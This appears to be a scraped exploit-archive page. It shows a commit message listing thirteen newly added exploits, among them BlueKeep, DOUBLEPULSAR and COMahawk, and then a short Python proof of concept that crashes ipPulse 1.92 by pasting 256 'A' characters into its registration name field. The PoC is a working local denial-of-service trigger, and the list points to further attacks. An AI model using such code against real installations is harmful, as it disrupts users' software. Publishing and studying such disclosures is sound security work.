72cddaee51
13 changes to exploits/shellcodes ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) Centova Cast 3.2.12 - Denial of Service (PoC) scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable' Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution Apache Httpd mod_proxy - Error Page Cross-Site Scripting Apache Httpd mod_rewrite - Open Redirects WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
24 lines
No EOL
743 B
Python
Executable file
24 lines
No EOL
743 B
Python
Executable file
# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
|
|
# Discovery by: Diego Buztamante
|
|
# Discovery Date: 2019-11-18
|
|
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
|
|
# Software Link : http://download.netscantools.com/ipls192.zip
|
|
# Tested Version: 1.92
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python ipPulse_1.92.py
|
|
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
|
|
# 3.- Open ippulse.exe
|
|
# 4.- Click on "Enter Key"
|
|
# 5.- Paste ClipBoard on "Name: "
|
|
# 6.- OK
|
|
# 7.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 256
|
|
f = open ("ipPulse_1.92.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |